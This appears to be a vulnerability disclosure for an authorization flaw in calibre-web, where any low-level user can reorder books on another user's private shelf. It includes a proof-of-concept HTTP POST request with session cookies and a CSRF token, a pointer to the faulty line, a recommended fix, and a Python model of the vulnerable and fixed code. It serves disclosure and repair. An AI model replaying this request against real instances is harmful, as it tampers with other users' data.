With default settings, low-level users do not have permission to edit the sort order of books in another user's private shelf. However, because the permission check is performed incorrectly, the application does not enforce this.
POST /shelf/order/3 HTTP/1.1
Host: 192.168.150.133:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
Origin: http://192.168.150.133:8083
Connection: close
Referer: http://192.168.150.133:8083/shelf/order/3
Cookie: session=.eJwljjtuAzEMBe-iOgV_4oq-zEKkSNgIkAC7dhXk7lkj3bx5zfy0vY487-32PF750fbHaremle4oAOUMmtFjRZ_OtapnRAayJktVokyrraoMttE7oW3ahZaJEfCQoVM3zgVAsiYNjjAuiU18GLuvyezl-D5gQhGJoLYr5HXm8V_D14zzqP35_ZlflwAtGIiKZkXxZpqDJ-lanmEis_fZC9vvH4AIP8o.Ye-55g.y2WeHCTSR6u3ZeXWL6zHGWmQWh4; remember_token=3|a0ad3ac22b2a1c95b6d18388d0186fbcd887a7b02378a4bb2498dc8a32770e173b14bae215b37137207d498cc4a6bdfd8c1b0784ee2f81085bebf3e6d3006edd
Upgrade-Insecure-Requests: 1
1=2&2=1&csrf_token=IjA2ZjA4MTE2MTk5ZjJjZjA4MTJhODNhMjZkZGJlYzk0NGE1NWE1ZjEi.Ye-55g.t3T1U1i3rXOQoAK-1Wi6sUtXm1I
In line 362 (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L362), the server checks the request's method (POST) and processes the data directly, without checking the user's permission for the shelf. I recommend putting the code for the user permission check (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L380) at the top of the order_shelf function.
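A minimal model of the bug described above and of the recommended fix. This is an added example, not calibre-web's own code: the User and Shelf classes and the can_edit_shelf rule are simplified stand-ins for the project's models and for the check at shelf.py#L380, and the request body follows the form data shown in the request above.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qsl


@dataclass
class User:
    id: int
    is_admin: bool = False


@dataclass
class Shelf:
    id: int
    user_id: int          # owner of the shelf
    is_public: bool
    order: dict = field(default_factory=dict)   # book_id -> position


def can_edit_shelf(user, shelf):
    """Assumed permission rule (stand-in for the real check at shelf.py#L380):
    owners may edit their own shelves; admins may edit public shelves."""
    if shelf.user_id == user.id:
        return True
    return shelf.is_public and user.is_admin


def parse_order_form(body):
    """Body like '1=2&2=1&csrf_token=...' -> {book_id: position}."""
    return {int(k): int(v) for k, v in parse_qsl(body) if k != "csrf_token"}


def order_shelf_vulnerable(method, body, user, shelf):
    """Bug pattern: the POST branch is served before any permission check,
    so any authenticated user can reorder any shelf, private ones included."""
    if method == "POST":
        shelf.order.update(parse_order_form(body))
        return 200
    if not can_edit_shelf(user, shelf):
        return 403
    return 200


def order_shelf_fixed(method, body, user, shelf):
    """Fix: authorise first, then handle the POST data."""
    if not can_edit_shelf(user, shelf):
        return 403
    if method == "POST":
        shelf.order.update(parse_order_form(body))
    return 200
```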
A low-level user can edit the sort order of books in any shelf (including another user's private shelf).